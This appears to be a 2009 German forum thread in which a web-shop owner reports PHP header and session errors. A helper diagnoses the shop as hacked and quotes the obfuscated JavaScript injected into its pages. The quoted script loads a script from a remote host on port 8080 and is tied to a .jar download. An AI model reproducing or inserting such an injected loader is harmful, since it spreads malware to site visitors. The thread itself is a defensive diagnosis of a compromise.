Pfalzcarp.de Posted December 23, 2009 Report Share Posted December 23, 2009 Hallo zusammen, ich habe ein Problem mit meinem Shop. Es fing heute mittag an. Zur Zeit kommt folgende Fehlermeldung wenn man einen Artikel in den Warenkorb gelegt hat. Warning: Cannot modify header information - headers already sent by (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:108) in /homepages/13/d97908204/htdocs/pfalzcarp/inc/xtc_redirect.inc.php on line 29 Wenn ich dann F5 drück ist der Artikel im Korb und der Shop erschient wieder. Wie kann ich das beheben ? Vielen Dank für Eure Hilfe ! Gruss, Torsten Link to comment Share on other sites More sharing options...
Pfalzcarp.de Posted December 24, 2009 Author Report Share Posted December 24, 2009 es geht leider weiter ... der login als admin geht nicht mehr, es kommt diese Meldung: Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:109) in /homepages/13/d97908204/htdocs/pfalzcarp/includes/functions/sessions.php on line 76 Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:109) in /homepages/13/d97908204/htdocs/pfalzcarp/includes/functions/sessions.php on line 76 Warning: Cannot modify header information - headers already sent by (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:109) in /homepages/13/d97908204/htdocs/pfalzcarp/inc/xtc_redirect.inc.php on line 29 Link to comment Share on other sites More sharing options...
alexoa Posted December 24, 2009 Report Share Posted December 24, 2009 Schau mal auf dem dem Server nach, wann die Files zuletzt geändert wurden. Ich vermute Dein Shop wurde gehackt. In Quelltext steht überall <script>/*GNU GPL*/ try{window.onload = function(){var Reo0kbvrvrz = document.createElement('s^$@c&r#$(#i$#)p^t#&)$'.replace(/\(|@|&|\$|\)|\^|\!|#/ig, ''));Reo0kbvrvrz.setAttribute('type', 'text/javascript');Reo0kbvrvrz.setAttribute('src', 'h&t#@t(p&:&(/&&/!p^(e^&)r$@e@)z$!h()#^i))$l$@&t##!!o)#$n&-^#c&o^)m&$.$^k^!a@(#&s^&&!(k&^u)@#$s!(#.!@$)u!s@.&)^5#$$(1!)#y@!(e!s#)$)-@^^@c&$@&o@@(m($.(m@$@u!)^s#^$i&c#$b!o@x$$p&$#)r#o).^r)!#$u$$:#@^8$#0#)8^#&0(^#/)o&(#)$r)!k#&u(&!&t#.&^&c)$$(o#)#.!&&i((n&)(/()(o&!r@$k@#u$$()!t@$.#c&o)#$.^&)i#n!@@/#!(@(f!)@e$)&^e((d^b($u$(@((r@&$@n##(^e(r@@@.&^&(#c&@&o#^(#m!^&/@@@g)l(^$o)!b##)@!e)&^7&^!$.@)c)!(!o&m)!/@^#g#@^(o^@o#$g@(l$(#e@.!&c((o!m@#$)/@)'.replace(/\!|\)|&|\$|\(|@|#|\^/ig, ''));Reo0kbvrvrz.setAttribute('defer', 'defer');Reo0kbvrvrz.setAttribute('id', 'M)#&v^@w!^!#2^@&!6&^()8^#h)n$!^(f)()o&@4)q^'.replace(/@|\!|&|\(|\)|\$|#|\^/ig, ''));document.body.appendChild(Reo0kbvrvrz);}} catch(e) {}</script> und meine Firewall wird auch ganz nervös, weil von einer russischen WebSite ein .jar File geladen wird. Also ganz schnell das Backup aufspielen, denn für Deine Kunden ist das nicht so toll an Weihnachten. Link to comment Share on other sites More sharing options...
Pfalzcarp.de Posted December 25, 2009 Author Report Share Posted December 25, 2009 So, scheint bis auf 2 Probleme alles behoben: 1) Nach dem Einloggen kann ich im Content Manager keine Seiten bearbeiten 2) Wollte ein Backup machen und bekomme die Meldung "Interner Fehler" Gruss, Torsten Link to comment Share on other sites More sharing options...
alexoa Posted December 25, 2009 Report Share Posted December 25, 2009 hat Du ein lokales Backup, dass Du wieder per FTP auf den Server spielen kannst? Frag bei Deinem Hoster nach, er soll 1 Tag vor der Attacke, den Stand wieder einspielen. Und dann schnell die Sicherheitsmängel beheben. Link to comment Share on other sites More sharing options...
Pfalzcarp.de Posted December 26, 2009 Author Report Share Posted December 26, 2009 So, alles wieder im Lot. Bis auf ein Problem mt dem Content Manager. Ich hoffe es kann mir jemand helfen. Das Bearbeitungsfenster der Seiten wird nicht mehr angezeigt. Siehe Screenshot ! Danke ! Gruss, Torsten Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.